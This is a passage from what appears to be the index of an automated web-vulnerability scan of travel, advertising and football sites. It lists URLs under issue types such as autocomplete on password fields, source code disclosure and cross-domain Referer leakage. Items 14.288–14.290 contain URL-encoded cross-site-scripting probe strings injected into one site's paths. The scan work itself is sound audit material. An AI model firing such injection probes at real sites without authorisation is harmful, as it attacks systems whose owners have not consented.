4729c84af9d01356ff4549842d482bfbf922038533f0af49904931657f6a1cb14afaa9b4effeed499720401fa163132412e7b4d68b365f93bb414881817626cc923cf7712880e14d920714634ee0e278e5c4a5e8ede9a5bf84ed5ea4ef6b081fba12756a17bbcdbeb30934e59109bf55e089e7c0445e608122e93f542fcffe0a416cb0f6f1d9e043afd36d28bf8d6f5d72478aaf920278d837d9ab8108027bf8d0b6d3d7c41e424cca9ea8136b4662f74194271d35f07097594dc8db4303c6594974c428d6516b683c83b675d87720709e1a3cae8fa521584d667c1a3a2297b2344d4bb09b64d8f2991ab4af3a54d9715a3a197f68201a331a797cadf884ea1d113ad78ad1699da6738b218b3d01ed440ad38fdbd44b4b06314deb47d16e4761a9dfb852ffb07d602bc202d39bee704da281510f739c44ceae7858ecff80794041524ee6a7fa76f99e71c06357b71de4c39c7f9f44432a51698ceb2db169e6548f3afd69edc76ffd7722f6e1cda863d30d65eac6c052622667e3f010f064e236d6454ce1af4f28902255f226117fe447834596e93f700700ec0adbd04869f76cf831aa9b0a21776c33a3042a85f734ef4000b93d6a670209691a5bcfb8cb940f0714ed3a23386fd5b7e51a9ae52e2fe054e9eaa

14.178. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2f67577bacd75f1782291db413e5148500103e9901f9138f3ecc45e1a17351e327846c1b8e797a0b3a413d308571a1642331ee41fbb8e7a116b4a76f41fdcb35b053e4fd0d4f4887a3e6fa9f9444be3347958846ece8717f653867a1bb55d084039dae6cd593e38cf3381b76f9412798114c13eee60d18ac04040f44e23a0def691164a4690571135ce1499229d752a7fbf8e53656e8a18bdf9f1fd25ae761ed3c7dec882b3b64609e6a6e20dbcfbcdb912759d584f823b5185ca4150ce4959a07dcff5ac53a16139211b0cb556cd69fb48a1dcba5d60771222daaf009b778966d228b012178fdd609edcf90d5924bf310972473f54a1ffc20583ba6b3c76a1733f00ac936579c56bdb60da65a9ef207789fc91bb93a6ca847c3b11dee47cf4582777ca82607b566da1ccb2577e7ff60f75eeb51d8656a6b645d99f3c6ead5327d90edb68d8e9ff88afbe1146d49e4ce9dc38c05471a854c68478d038a5b022672d555ce40ada2b5ad02e6380f00e53b7603302fc6375e60652af6ee7c7f9733204e3717403e0196c249c4cea1b479e5537d8a22e039104d2d3cbcb2ba35565e471fb92980b396aa148d4d55cfdb2344aa46c14907ae71fac1059caa22f88cb5610a1b30e974a7a71d2e3e002299986f1f1d8463caf5a530f393a3fc5a8866ff455326077ad9c3410e595256efb41a1d5a83b0801c5841eee0e1418a5ce41416d89bb7cfe1310a2c13b91d927d592168f95eb77fc9d4ae95593766a20e9843d6d2ffa2d61a7e41725babc745d8400eeeafd00dbbc4e265d8e1a68a095618f24d537f69227a5c75e0068177a7009b4c1f6a659f25ce2544c00c45df23724c3ce75728995b1c5f808a9006f510d6f449f5b7d5faae280ba17fa7d8ac24d2223304dcad0e4c9c66065ce714112788a741f5ffe4ac4ccb543a06d416509a2594d0a9c5aac62639b1e2461dcbc023d4f94ec670a4d90a393d281eee7ac1a7a6d12abc7a3f36121634921c13481c87cdc5e3686328d4c84357836d17b2d9d378343b8120704ef2f68797a71475c58673cb80d0776b2a028abc59e54fdc29c1a84af3f644c147abf2c1f2d454a330a0c3c489d958b4cb79bb3eb21ec1da3a76b519e28710c34cba3da7bf10e5b263108fb57711b6771ccfaa872df7109e44d9474019da921e85684f46b420d62184a4c2d59def5c85060d23bd3877af6ccfe11a507a7e7bdd1d3bc9a4f84c33b9139ec9e7d91cc36e42f0b9df9ade25fb8a7e26304ec1d62979c0329521127e7621277e081406186f6c361c9e1ff0fd840c78037c6205b105160f4a2fc9ac41294ac9bda016e9f630dede55b8a8ac0407857d2f18f2022f5bfb0f1094c1b56477849fa2acea99f60fe8023330d7

14.179. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05d90d4830aed146528bc7a64ca8ada47c6bf82900592c70ecc3cf0b1540026e67dac30bd8f67c33172cefc55102800212a019e71c8816622a8e05f10e934ccb5dfda43050f415957009a93c2264405b2733e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adffbb0ddf19506aa1b79ffc81dbccf544d4c1440b6bf54cd895f8da9688aa5bdc0a67d4426af046a81046c53e4aa435fb61e110b17a27b1bf4335d67ab704b7c1146fd4b993c954ebbb8b9f7775be2a090d18414c00cb475a10d559cbd1008554cbf510f1ac594b789c7220ccac8ab7cbe4718f4500df296901685f020a1244a11fb6c96cf271db3fbc9e04d8bfaf9402f73078ac73ff713c32865df512b24b3ea21d0eaa6e4a43a9d58ea0743cb6d22de2b7509878fc77c403faf109124548857bce20bbf5c99a24c64c9991cbc396ca84692a505ae0d901bc6053be6674aa51ada449b125b82ba32fb4ced09c86478692535e794be8ca34d0ca1e7d0cf9ec8bf82fedf4e7a09a1a68b9cd7500419c41f67108d03dd5e022071c856cd4caba6a9fc51b3391c4af22b2957755ac6705e6e2627e5fe3a3dc3206c047b010e4475

14.180. http://pixel.rubiconproject.com/di.php

14.181. http://pixel.rubiconproject.com/tap.php

14.182. http://psa-d.openx.com/w/1.0/ajs

14.183. http://r.openx.net/set

14.184. http://r.turn.com/r/beacon

14.185. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/

14.186. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW

14.187. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/

14.188. http://r1-ads.ace.advertising.com/site=793631/size=160600/u=2/bnum=63830787/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

14.189. http://r1-ads.ace.advertising.com/site=793631/size=160600/u=2/bnum=74948035/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

14.190. http://r1-ads.ace.advertising.com/site=793633/size=728090/u=2/bnum=55878431/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

14.191. http://r1-ads.ace.advertising.com/site=797434/size=300250/u=2/bnum=24812117/hr=20/hl=8/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.igougo.com%252Fabout%252F

14.192. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

14.193. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

14.194. http://r1-ads.ace.advertising.com/site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

14.195. http://rs.gwallet.com/r1/pixel/x1743

14.196. http://rs.gwallet.com/r1/pixel/x914r7675757

14.197. http://safebrowsing.clients.google.com/safebrowsing/downloads

14.198. http://sales.liveperson.net/hc/15744040/

14.199. http://serve.williamhill.com/promoLoadDisplay

14.200. http://servedby.flashtalking.com/click/1/16628

14.201. http://servedby.flashtalking.com/imp/1/16628

14.202. http://showadsak.pubmatic.com/AdServer/AdServerServlet

14.203. http://showadsak.pubmatic.com/AdServer/AdServerServlet

14.204. http://showadsak.pubmatic.com/AdServer/AdServerServlet

14.205. http://showadsak.pubmatic.com/AdServer/AdServerServlet

14.206. http://showadsak.pubmatic.com/AdServer/AdServerServlet

14.207. http://showadsak.pubmatic.com/AdServer/AdServerServlet

14.208. http://showadsak.pubmatic.com/AdServer/AdServerServlet

14.209. http://showadsak.pubmatic.com/AdServer/AdServerServlet

14.210. http://showadsak.pubmatic.com/AdServer/AdServerServlet

14.211. http://showadsak.pubmatic.com/AdServer/AdServerServlet

14.212. http://statse.webtrendslive.com/dcs0sd6z700000cpbndecaa4f_6n9k/dcs.gif

14.213. http://tag.admeld.com/id

14.214. http://tag.admeld.com/pixel

14.215. http://tag.contextweb.com/TagPublish/GetAd.aspx

14.216. http://tap.rubiconproject.com/oz/feeds/targus/profile

14.217. http://tap.rubiconproject.com/oz/sensor

14.218. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

14.219. http://travel.travelocity.com/hotel/HotelAvailability.do

14.220. http://travel.travelocity.com/hotel/HotelCobrand.do

14.221. http://travel.travelocity.com/hotel/HotelDetail.do

14.222. http://travel.travelocity.com/pub/gwt/hotel/esf/NoCacheAction.do

14.223. http://travela.priceline.com/sharedapps/scs

14.224. http://u.openx.net/w/1.0/sc

14.225. http://user.lucidmedia.com/clicksense/user

14.226. http://uxm.thousandeyes.com/rest/json

14.227. http://vitamine.networldmedia.net/bts/generic14.php

14.228. http://www.agoda.com/partners/partnersearch.aspx

14.229. http://www.burstnet.com/cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/

14.230. http://www.cheaptickets.com/shop/hotelsearch

14.231. http://www.expedia.com/Hotel-Search

14.232. http://www.expedia.com/TripPreferences

14.233. http://www.expedia.com/daily/common/mscookie.aspx

14.234. http://www.expedia.com/pubspec/scripts/eap.asp

14.235. http://www.getaroom.com/

14.236. http://www.getaroom.com/browse/market_deals

14.237. http://www.getaroom.com/searches/show

14.238. http://www.getaroom.com/searches/show

14.239. http://www.getaroom.com/washington-dc

14.240. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live

14.241. http://www.hotelplanner.com/Search/Index.cfm

14.242. https://www.hotelplanner.com/Accept/Reserve.cfm

14.243. http://www.hotels.com/PPCHotelDetails

14.244. http://www.hotels.com/PPCSearch

14.245. http://www.hotels.com/compare/hotel_dockingbar.html

14.246. http://www.hotels.com/hotel/details.html

14.247. http://www.hotels.com/hotel/hoteldata.html

14.248. http://www.hotels.com/hoteldetails/urgencypopup.html

14.249. http://www.hotels.com/html/blank.html

14.250. http://www.hotels.com/html/tealeaf.html

14.251. http://www.hotels.com/search.do

14.252. http://www.hotels.com/search/search.html

14.253. http://www.hotels.com/selectors/en_US/

14.254. http://www.hotwire.com/hotel/results.jsp

14.255. http://www.hotwire.com/hotel/search-options.jsp

14.256. http://www.igougo.com/about/

14.257. http://www.igougo.com/traveldeals/ratefinder.aspx

14.258. http://www.luminate.com/widget/53d1ac1014/

14.259. http://www.orbitz.com/

14.260. http://www.orbitz.com/App/SubmitQuickSearch

14.261. http://www.orbitz.com/App/ViewDHTMLCalendar

14.262. http://www.orbitz.com/App/ViewFlightSearchResults

14.263. http://www.orbitz.com/shop/hotelsearch

14.264. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=225&rotator=true&width=519&adType=script&

14.265. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

14.266. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

14.267. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

14.268. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

14.269. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=55&width=120&

14.270. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=1&

14.271. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=2&

14.272. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=3&

14.273. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=4&

14.274. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=336x600&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=600&width=336&adType=noframe&pos=external&

14.275. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

14.276. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=60&width=468&adType=noframe&

14.277. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=150&width=519&adType=noframe&

14.278. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=90&width=728&adType=noframe&

14.279. http://www.sabreairlinesolutions.com/home/

14.280. http://www.sabretravelnetwork.com/home

14.281. http://www.sabretravelnetwork.com/home/

14.282. http://www.sabretravelnetwork.com/home/products_services

14.283. http://www.sabretravelnetwork.com/home/products_services/product_index/

14.284. http://www.sabretravelnetwork.com/home/products_services/product_index/images/loadingAnimation.gif

14.285. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/

14.286. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif

14.287. http://www.sabretravelnetwork.com/home/search/show_results

14.288. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

14.289. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

14.290. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

14.291. http://www.sabretravelnetwork.com/images/home-text.png

14.292. http://www.wtp101.com/f

14.293. http://www.wtp101.com/pixel

14.294. http://www.wtp101.com/pull_sync

14.295. http://www.wtp101.com/push_sync

14.296. http://www9.effectivemeasure.net/v4/em_js

15. Password field with autocomplete enabled

15.1. http://www.booking.com/general.en-us.html

15.2. http://www.booking.com/hotel/us/c-boston-massachusettes.html

15.3. http://www.booking.com/hotel/us/copley-square.en-us.html

15.4. http://www.booking.com/index.en-us.html

15.5. http://www.booking.com/index.en-us.html

15.6. http://www.booking.com/searchresults.html

15.7. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm

15.8. http://www.hotelplanner.com/Search/Index.cfm

15.9. https://www.hotelplanner.com/Accept/Reserve.cfm

15.10. http://www.manutd.com/

15.11. http://www.manutd.com/One-United/Login.aspx

15.12. http://www.manutd.com/One-United/Login.aspx

15.13. http://www.manutd.com/Search-Results.aspx

15.14. http://www.manutd.com/en.aspx

15.15. http://www.manutd.com/en/Club/Sponsors.aspx

15.16. http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx

15.17. http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx

15.18. http://www.manutd.com/en/One-United.aspx

15.19. http://www.turkishairlines.com/en-CA/index.aspx

15.20. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

16. Source code disclosure

16.1. http://travela.priceline.com/hotel/js/searchValidation.js

16.2. http://travelocity.ugc.bazaarvoice.com/module/0025-en_us/cmn/0025-en_us/display.pkg.js

16.3. http://www.aon.com/manchesterunited/vagroundedstd-light-webfont.ttf

16.4. http://www.expedia.com/static/default/default/images/hotel-sprite.gif

16.5. http://www.expedia.com/static/default/default/images/infosite/bg_button_b.gif

16.6. http://www.expedia.com/static/default/default/images/infosite/bg_button_span_b.gif

16.7. http://www.expedia.com/static/default/default/images/infosite/button_beak_b.gif

16.8. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif

16.9. http://www.expedia.com/static/default/default/images/infosite/rooms_left_middle.gif

16.10. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif

16.11. http://www.expedia.com/static/fusion/v2.3/images/progressAnim.gif

16.12. http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run

16.13. http://www.hotels.com/bundles/enhanced_search-H36.0.2-128976.js

16.14. http://www.hotels.com/bundles/hcom-H36.0.2-128976.js

16.15. http://www.sabrehospitality.com/js/roundies.js

17. Referer-dependent response

17.1. http://d.tradex.openx.com/afr.php

17.2. http://delivery.hotels.com/Hotels/Delivery.aspx

17.3. http://extras.expedia.com/Hotels/Delivery/ISDirect.aspx

17.4. http://goal.us.intellitxt.com/intellitxt/front.asp

17.5. http://www.facebook.com/plugins/like.php

17.6. http://www.hotels.com/html/blank.html

18. Cross-domain POST

18.1. http://www.aon.com/site/products-services.jsp

18.2. http://www.aon.com/site/search.jsp

18.3. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live

18.4. http://www.guardian.co.uk/football/manchester-united

18.5. http://www.sabreairlinesolutions.com/home/

18.6. http://www.turkishairlines.com/en-CA/index.aspx

18.7. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

18.8. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

18.9. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

18.10. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

18.11. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

18.12. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

19. Cross-domain Referer leakage

19.1. http://a.collective-media.net/cmadj/cm.guardian/

19.2. http://ad.doubleclick.net/adi/N5282.161249.ADNETIK.COM/B5256632.283

19.3. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15

19.4. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28

19.5. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.30

19.6. http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2

19.7. http://ad.doubleclick.net/adi/gna.en/level2

19.8. http://ad.doubleclick.net/adj/cm.guardian/

19.9. http://ad.doubleclick.net/adj/cm.guardian/

19.10. http://ad.doubleclick.net/adj/gna.en/level2

19.11. http://ad.doubleclick.net/adj/ta.ta.com.s/na.us.ma.boston

19.12. http://ad.turn.com/server/ads.js

19.13. http://ad.yieldmanager.com/iframe3

19.14. http://ad.yieldmanager.com/iframe3

19.15. http://ad.yieldmanager.com/iframe3

19.16. http://ad.yieldmanager.com/iframe3

19.17. http://ad.yieldmanager.com/iframe3

19.18. http://ad.yieldmanager.com/iframe3

19.19. http://ad.yieldmanager.com/iframe3

19.20. http://ad.yieldmanager.com/iframe3

19.21. http://ad.yieldmanager.com/iframe3

19.22. http://ad.yieldmanager.com/iframe3

19.23. http://ad.yieldmanager.com/iframe3

19.24. http://ad.yieldmanager.com/iframe3

19.25. http://ad.yieldmanager.com/iframe3

19.26. http://ad.yieldmanager.com/iframe3

19.27. http://ad.yieldmanager.com/iframe3

19.28. http://ad.yieldmanager.com/iframe3

19.29. http://ad.yieldmanager.com/iframe3

19.30. http://ad.yieldmanager.com/iframe3

19.31. http://ad.yieldmanager.com/iframe3

19.32. http://ad.yieldmanager.com/iframe3

19.33. http://ad.yieldmanager.com/iframe3

19.34. http://ad.yieldmanager.com/iframe3

19.35. http://ad.yieldmanager.com/iframe3

19.36. http://ad.yieldmanager.com/iframe3

19.37. http://ad.yieldmanager.com/iframe3

19.38. http://ad.yieldmanager.com/iframe3

19.39. http://ad.yieldmanager.com/iframe3

19.40. http://ad.yieldmanager.com/iframe3

19.41. http://ad.yieldmanager.com/iframe3

19.42. http://ad.yieldmanager.com/iframe3

19.43. http://ad.yieldmanager.com/iframe3

19.44. http://ad.yieldmanager.com/iframe3

19.45. http://ad.yieldmanager.com/iframe3

19.46. http://ad.yieldmanager.com/iframe3

19.47. http://ad.yieldmanager.com/iframe3

19.48. http://ad.yieldmanager.com/iframe3

19.49. http://ad.yieldmanager.com/iframe3

19.50. http://ad.yieldmanager.com/iframe3

19.51. http://ad.yieldmanager.com/iframe3

19.52. http://ad.yieldmanager.com/iframe3

19.53. http://ad.yieldmanager.com/iframe3

19.54. http://ad.yieldmanager.com/iframe3

19.55. http://ad.yieldmanager.com/iframe3

19.56. http://ad.yieldmanager.com/iframe3

19.57. http://ad.yieldmanager.com/iframe3

19.58. http://ad.yieldmanager.com/iframe3

19.59. http://ad.yieldmanager.com/iframe3

19.60. http://ad.yieldmanager.com/iframe3

19.61. http://ad.yieldmanager.com/iframe3

19.62. http://ad.yieldmanager.com/iframe3

19.63. http://ad.yieldmanager.com/iframe3

19.64. http://ad.yieldmanager.com/iframe3

19.65. http://ad.yieldmanager.com/iframe3

19.66. http://ad.yieldmanager.com/iframe3

19.67. http://ad.yieldmanager.com/iframe3

19.68. http://ad.yieldmanager.com/iframe3

19.69. http://ad.yieldmanager.com/iframe3

19.70. http://ad.yieldmanager.com/iframe3

19.71. http://ad.yieldmanager.com/iframe3

19.72. http://ad.yieldmanager.com/iframe3

19.73. http://ad.yieldmanager.com/iframe3

19.74. http://ad.yieldmanager.com/iframe3

19.75. http://ad.yieldmanager.com/iframe3

19.76. http://ad.yieldmanager.com/iframe3

19.77. http://ad.yieldmanager.com/iframe3

19.78. http://ad.yieldmanager.com/iframe3

19.79. http://ad.yieldmanager.com/iframe3

19.80. http://ad.yieldmanager.com/iframe3

19.81. http://ad.yieldmanager.com/iframe3

19.82. http://ad.yieldmanager.com/iframe3

19.83. http://ad.yieldmanager.com/iframe3

19.84. http://ad.yieldmanager.com/iframe3

19.85. http://ad.yieldmanager.com/iframe3

19.86. http://ad.yieldmanager.com/iframe3

19.87. http://ad.yieldmanager.com/imp

19.88. http://ad.yieldmanager.com/imp

19.89. http://ads.pointroll.com/PortalServe/

19.90. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH

19.91. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812309%7C0%7C1%7CADTECH

19.92. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812326%7C0%7C1%7CADTECH

19.93. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH

19.94. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

19.95. http://adserver.adtech.de/addyn%7C3.0%7C999%7C3106021%7C0%7C168%7CADTECH

19.96. http://adserver.adtech.de/addyn%7C3.0%7C999%7C3173523%7C0%7C477%7CADTECH

19.97. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH

19.98. http://afe.specificclick.net/

19.99. http://afe.specificclick.net/

19.100. http://as.chango.com/links/adunit/1.31759988192e+12

19.101. http://bh.contextweb.com/bh/rtset

19.102. http://bp.specificclick.net/

19.103. http://bp.specificclick.net/

19.104. http://cdn.flashtalking.com/container/4649/4649.js

19.105. http://clk.specificclick.net/click/v=5

19.106. http://cm.g.doubleclick.net/pixel

19.107. http://cm.g.doubleclick.net/pixel

19.108. http://cm.g.doubleclick.net/pixel

19.109. http://cm.g.doubleclick.net/pixel

19.110. http://cm.g.doubleclick.net/pixel

19.111. http://cm.g.doubleclick.net/pixel

19.112. http://cm.g.doubleclick.net/pixel

19.113. http://cm.g.doubleclick.net/pixel

19.114. http://cm.g.doubleclick.net/pixel

19.115. http://cms.ad.yieldmanager.net/v1/cms

19.116. http://d.tradex.openx.com/afr.php

19.117. http://d.tradex.openx.com/afr.php

19.118. http://d.tradex.openx.com/afr.php

19.119. http://delivery.hotels.com/Hotels/Delivery.aspx

19.120. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

